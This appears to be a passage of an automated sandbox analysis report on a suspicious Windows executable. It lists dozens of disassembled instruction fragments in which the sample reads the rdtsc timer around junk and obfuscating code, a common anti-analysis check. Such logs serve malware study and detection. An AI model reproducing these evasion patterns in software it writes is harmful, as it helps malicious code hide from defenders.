Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15D5BAC second address: 15D5BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F10C4816DF6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C4816DFBh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 15D5BC5 second address: 15D5BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F10C4818127h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007F10C4818116h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1620D0D second address: 1620D22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F10C4816DFDh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162106C second address: 1621072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162118D second address: 1621193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1621193 second address: 1621198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1621198 second address: 162119D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162136D second address: 1621373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162146A second address: 1621470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1622B79 second address: 1622B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F10C4818116h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1622B88 second address: 1622B98 instructions: 0x00000000 rdtsc 0x00000002 js 00007F10C4816DF6h 0x00000008 je 00007F10C4816DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1622B98 second address: 1622B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1622B9E second address: 1622BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1622BA8 second address: 1622BFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F10C481811Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F10C4818127h 0x00000013 pushad 0x00000014 jne 00007F10C4818116h 0x0000001a jmp 00007F10C4818125h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 je 00007F10C481811Eh 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1623259 second address: 1623274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e js 00007F10C4816DF6h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1623274 second address: 162328C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4818124h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1623CD2 second address: 1623CEA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F10C4816DFBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1623CEA second address: 1623D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D3825h] 0x0000000f clc 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F10C4818118h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov di, bx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F10C4818118h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007F10C481811Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 pop esi 0x00000056 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1623D55 second address: 1623D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16246B1 second address: 16246C3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16246C3 second address: 16246C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16246C9 second address: 16246CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1627A43 second address: 1627A4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1627A4D second address: 1627AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F10C4818118h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F10C4818118h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 push 00000000h 0x00000042 jmp 00007F10C481811Fh 0x00000047 xchg eax, ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1627AB2 second address: 1627AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1627AB7 second address: 1627AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1627AC5 second address: 1627AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1627AC9 second address: 1627AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162C9C8 second address: 162CA40 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F10C4816DF8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov edi, dword ptr [ebp+122D35A9h] 0x0000002b xor ebx, 6AD7BE4Ch 0x00000031 push 00000000h 0x00000033 movzx edi, si 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F10C4816DF8h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000015h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov dword ptr [ebp+122D2FAAh], edx 0x00000058 xchg eax, esi 0x00000059 jmp 00007F10C4816E00h 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162DA0B second address: 162DA8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 js 00007F10C4818118h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D2C1Fh], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F10C4818118h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+122D35A9h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F10C4818118h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 xor ebx, dword ptr [ebp+122D35C1h] 0x0000005c mov di, 5D67h 0x00000060 mov di, cx 0x00000063 push eax 0x00000064 push edi 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F10C481811Bh 0x0000006c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162E8BB second address: 162E8C6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162E8C6 second address: 162E935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 ja 00007F10C4818116h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jno 00007F10C481812Fh 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F10C4818118h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 mov ebx, dword ptr [ebp+122D370Dh] 0x0000003c push 00000000h 0x0000003e mov di, B7F2h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push esi 0x00000046 jno 00007F10C4818116h 0x0000004c pop esi 0x0000004d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162E935 second address: 162E93A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1628284 second address: 1628296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F10C4818118h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1628296 second address: 162829C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1630988 second address: 1630992 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162BBB6 second address: 162BBEF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F10C4816E08h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F10C4816E06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1630992 second address: 1630999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162CC66 second address: 162CC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 162DBE9 second address: 162DBED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1631C88 second address: 1631C97 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16352C4 second address: 16352CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16352CA second address: 16352CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16352CE second address: 163535E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F10C481812Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F10C4818118h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a jmp 00007F10C481811Eh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F10C4818118h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b movsx ebx, di 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+122D1B1Ch] 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F10C481811Ah 0x0000005e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163535E second address: 1635368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1635368 second address: 1635383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007F10C481812Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163845A second address: 1638460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1638460 second address: 1638464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394BE second address: 16394C8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F10C4816DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394C8 second address: 16394E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4818127h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394E3 second address: 16394E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16394E7 second address: 1639531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F10C4818118h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 sbb edi, 734A5A00h 0x0000002b push 00000000h 0x0000002d jmp 00007F10C481811Ah 0x00000032 push 00000000h 0x00000034 mov ebx, edi 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 je 00007F10C481811Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1639531 second address: 1639535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1639535 second address: 163953B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163953B second address: 163953F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1630B82 second address: 1630B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1630B86 second address: 1630BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jne 00007F10C4816DF6h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A4F9 second address: 163A529 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F10C481812Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C481811Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A529 second address: 163A533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F10C4816DF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163C603 second address: 163C608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E4A second address: 1632E60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E60 second address: 1632E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E65 second address: 1632E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F10C4816E05h 0x00000012 jmp 00007F10C4816DFFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 1632E86 second address: 1632F1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F10C4818118h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov edi, esi 0x00000026 and ebx, 5949D1B9h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007F10C481811Ah 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push eax 0x00000040 jp 00007F10C481811Ch 0x00000046 mov dword ptr [ebp+122D2244h], edx 0x0000004c pop edi 0x0000004d mov eax, dword ptr [ebp+122D0615h] 0x00000053 jmp 00007F10C481811Ch 0x00000058 push FFFFFFFFh 0x0000005a push 00000000h 0x0000005c push ebx 0x0000005d call 00007F10C4818118h 0x00000062 pop ebx 0x00000063 mov dword ptr [esp+04h], ebx 0x00000067 add dword ptr [esp+04h], 0000001Ah 0x0000006f inc ebx 0x00000070 push ebx 0x00000071 ret 0x00000072 pop ebx 0x00000073 ret 0x00000074 push eax 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push ebx 0x00000079 pop ebx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163550F second address: 16355BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push edx 0x0000000a add dword ptr [ebp+122D2E57h], ebx 0x00000010 pop edi 0x00000011 push dword ptr fs:[00000000h] 0x00000018 or dword ptr [ebp+122D1D1Eh], eax 0x0000001e mov dword ptr [ebp+1245B886h], edx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F10C4816DF8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000017h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 jne 00007F10C4816E12h 0x0000004b ja 00007F10C4816E00h 0x00000051 mov eax, dword ptr [ebp+122D0C0Dh] 0x00000057 mov edi, ecx 0x00000059 push FFFFFFFFh 0x0000005b mov edi, 70A869C1h 0x00000060 nop 0x00000061 jmp 00007F10C4816E08h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16355BA second address: 16355C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16467C0 second address: 16467C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 16467C4 second address: 1646801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F10C4818123h 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007F10C4818126h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jnp 00007F10C4818116h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A765 second address: 163A77B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C4816E02h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 163A81F second address: 163A82D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10C4818116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
